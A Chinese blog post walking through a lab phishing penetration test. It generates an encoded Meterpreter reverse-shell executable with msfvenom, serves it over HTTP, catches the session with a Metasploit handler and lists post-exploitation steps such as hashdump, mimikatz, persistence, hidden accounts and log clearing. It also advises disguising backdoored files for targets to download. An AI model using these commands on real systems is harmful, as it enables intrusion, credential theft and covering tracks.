钓鱼渗透测试实验复现

发布时间:2026/9/9 19:41:59

钓鱼渗透测试实验复现 钓鱼渗透测试实验复现用途网络安全学习分享仅限授权环境测试一、实验环境角色系统/工具IP地址攻击机Windows 11矛盾武器库10.0.0.166靶机Windows 10 x6410.0.0.153攻击机Windows 11 Penetration Suite Toolkit - VMware Workstation矛盾武器库可以去下载靶机普通win10 X64二、实验原理本次实验采用「后门植入 反向连接」的经典渗透链路MSFvenom生成带有反向 Shell 的 Payload可执行文件。攻击机开启 HTTP 服务供靶机下载 Payload。MSFconsole Handler在攻击机监听指定端口等待靶机上线。靶机执行 Payload后Meterpreter 会话建立进入后渗透阶段。三、实验步骤关闭靶机防火墙互相ping网段测试链接靶机ping攻击机攻击机ping靶机生成payload攻击机使用MSF矛盾武器库自带无需额外下载分为MSFvenom和MSFconsolemsfvenom 生成 payloadmsfconsole 多模块后续操作先用msfvenom生成payload在桌面msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST10.0.0.166 LPORT4444 -e x64/xor_dynamic -i 5 -f exe -o C:\Users\Administrator\Desktop\shell.exe然后新开一个窗口打开攻击机的8080端口让靶机能够正常访问netsh advfirewall firewall add rule nameHTTP_8080 dirin actionallow protocoltcp localport8080还有4444端口后面也会用到netsh advfirewall firewall add rule nameMSF_4444 dirin actionallow protocoltcp localport4444在桌面开启http服务python3 -m http.server 8080打开MSFconsole命令行输入banner查看信息和各模块数量exploit漏洞攻击/利用模块auxiliary辅助模块信息收集、扫描、嗅探、指纹识别、口令猜解post后渗透模块获取目标系统的控制权以后进行的一系列攻击动作比如获取敏感信息、跳板攻击等paylods攻击代码或指令encoders加密模块对payload进行加密躲避杀毒软件的查杀nops提高和维持payload稳定性evasion高级免杀使用模块use exploit/multi/handler输入show options查看信息以下是配置信息set PAYLOAD windows/x64/meterpreter/reverse_tcpset LHOST 10.0.0.166set LPORT 4444run正在监听然后我们切换到靶机来访问攻击机地址并下载shell.exe会被实时监测查杀我们做实验环境简单教学为主关闭实时保护现在下载下来执行文件返回攻击机可以发现已经成功连接靶机然后进输入shell可以运用靶机的shell窗口输入whoami发现我们是管理员账户实验环境靶机登陆的就是管理员现在截张靶机图片成功拿下关闭攻击机实验开放窗口netsh advfirewall firewall delete rule nameHTTP_8080netsh advfirewall firewall delete rule nameMSF_4444结尾正常渗透后应该是普通用户先进行信息搜集再提升权限凭证获取权限维持横向移动做完清理痕迹不做演示。信息搜集sysinfo、getuid、ps、ipconfig、route权限提升getsystem、local_exploit_suggester凭证获取hashdump、kiwi/mimikatz明文密码权限维持persistence、注册表后门、添加隐藏用户横向移动route add socks_proxy 跳板进内网痕迹清理clearev、删除后门账户与文件万变不离其宗钓鱼的办法就是伪装正常文件或在正常文件添加后门让对方下载使用方法多样自行发挥。以上仅作学习分享。
延伸阅读

更多相关文章

2026/9/7 4:56:57

MLX框架下的Laguna-M.1-4bit部署指南:从零到生产环境

MLX框架下的Laguna-M.1-4bit部署指南:从零到生产环境 【免费下载链接】Laguna-M.1-4bit 项目地址: https://ai.gitcode.com/hf_mirrors/mlx-community/Laguna-M.1-4bit 欢迎来到MLX框架下的Laguna-M.1-4bit部署终极指南!🎉 本文将带你…

2026/9/9 19:40:16

SSM+Vue智慧项目管理系统毕业设计完整实战指南

每年到了毕业设计的节点,我都能感觉到那种“题目看着会,一到动手就卡住”的焦虑。上个月刚陪一位学弟把“盘山县智慧项目管理系统”这套SSM Vue毕设完整地走了一遍流程,从选题、建库、写后端接口、调前端页面,到论文成稿、部署演…

2026/9/9 19:40:16

Java大厂面试核心考点:从JVM原理到高并发流量治理

最近好些朋友都在准备Java岗位的面试,聊下来发现一个共性问题:八股文背了不少,面试官一问就露馅。不是记不住,是压根没理解那些概念解决的是什么问题。有些人在基础题上翻车,有些人在微服务扩展上卡壳,还有…

2026/9/9 19:40:16

三菱PLC台车呼叫控制系统:16工位程序设计与调试全解析

前阵子给一条自动喷涂线做了一套台车呼叫控制系统,轨道上跑一台往复转运台车,沿线16个工位,每个工位都能呼叫台车过来卸料、装料。接活的时候我以为这种程序不算难,无非是十六个按钮对应十六个动作,可真正把工艺和IO表…

2026/9/9 19:40:16

基于Copula相关性建模与热泵灵活性调度的风光出力波动平抑策略

做新能源并网项目的人应该都对这张图不陌生:大风天里光伏和风电同时出力飙升,净负荷曲线像过山车一样往下冲,火电机组慌慌张张往下压;到了晚上风停了、光伏也没了,净负荷又陡增,机组又得拼命往上顶。这种反…

2026/9/9 19:35:15

普通账号提权路径全解析:从渗透测试到系统加固

普通账号提权这六个字,在安全圈里几乎每个工作日都会出现。不管你是做授权的红队测试,还是打CTF靶场,又或者只是负责一台被“疑似入侵”的服务器的排查,最后大概率都会落到同一个问题上:手里已经有一个普通权限了&…

2026/9/9 13:11:35

超人会飞不算本事:系统稳定依赖清晰规则与边界设计

开头先不绕弯子。“#斯坦李吐槽dc 所以超人是无缘无故会飞的嘛哈哈哈哈哈哈哈锤哥真是技术人才啊!#雷神 #复联”这类调侃式短标题,第一波冲击力在于它把两个宇宙的角色塞进同一个吐槽箱里,但细想一下就能发现,它真正碰到的根本不是…

2026/9/8 7:15:15

超人VS蜘蛛侠:拆解超级IP的影响力与传播方法论

把“蜘蛛侠 vs 超人”放在 CSDN 上聊,可能很多人第一反应是走错片场了。但如果把这两个角色看成“两个持续运营了 80 多年的文化产品”,你会发现,这场比较本质上是两个不同 IP 策略的长期结果对比:超人赢在定义了整个超级英雄题材…

2026/9/9 16:31:09

基于CNN的调制信号识别:MATLAB实现时频图分类实战

简介:本资源是一套面向通信工程与信号处理方向学习者、研究者的深度学习实践方案,聚焦调制信号自动检测与识别这一典型无线通信任务,解决传统方法依赖人工特征、低信噪比下性能下降等痛点。压缩包共12个文件(10.73MB)&…

2026/9/9 0:00:48

MHS模型硬件标准:让大模型像调用软件一样控制物理设备

让Claude真正看着显微镜说“这个细胞形态不太对”,或者让大模型自己调一版机械臂的运动轨迹,这事儿听上去已经很接近科幻片了。但你真上手试一次就会发现,模型不缺智商,缺的是一个能插进显微镜、机械臂、激光控制器里的“通用插座…

2026/9/9 0:00:48

AI五大核心方向详解:从机器学习到大模型,零基础转行选哪条?

会有人告诉我,他想转行学AI,但打开招聘网站一看直接傻眼:机器学习、深度学习、自然语言处理、计算机视觉、大模型应用……满屏都是这些词,好像每个都会一点,又好像每个都离自己很远。还有人上来就问“学Python还是学Ja…

2026/9/9 0:00:49

从50行最小循环到生产级AI引擎:工程化改造全解析

直接说干货。这一章我写的不是那种"hello world跑通某个模型"的教程,而是把AI引擎当做一个真正要上线、要被人调用、要扛流量的系统来聊。从最初只有50行的最小循环,到能够承载生产流量的AI引擎,中间差的不是代码量,而是…

2026/9/7 16:23:03

USB Type-C PCB布局分区设计:电源、高速信号与PD协议全攻略

做硬件这行,Type-C接口算是典型的“看着简单,做起来全坑”的东西。光引脚就24个,高低速信号、电源、控制线全部塞在一个小小的连接器里,如果PCB布局不做规划,打样回来基本就是“插上没反应”、“高速掉线”、“静电一打…

2026/9/7 22:46:00

系统编程学习原型如何补齐稳定性边界

系统编程学习原型如何补齐稳定性边界预算有限时&#xff0c;我先优化明显多余的复制&#xff0c;而不是猜测性地换容器。用借用传递只读数据通常就能减少分配&#xff1a; fn parse(line: &str) -> Result<Item, Error> { /* ... */ }用基准确认热点确实在分配&am…

2026/9/9 10:21:54

雨花区哪家财务公司代理记账比较好?

在雨花区&#xff0c;企业处理财税事务常常面临诸多挑战&#xff0c;选择一家靠谱的财务公司至关重要。湖南巨勤财务管理咨询有限公司就是本地正规实体财税服务机构&#xff0c;深耕本地工商财税行业多年&#xff0c;熟悉当地工商局、税务局最新政策与申报流程。主营公司注册、…

还想了解更多?直接咨询顾问

免费诊断 + 免费方案 + 透明报价。

全国咨询热线400-8866-253
免费获取方案
咨询二维码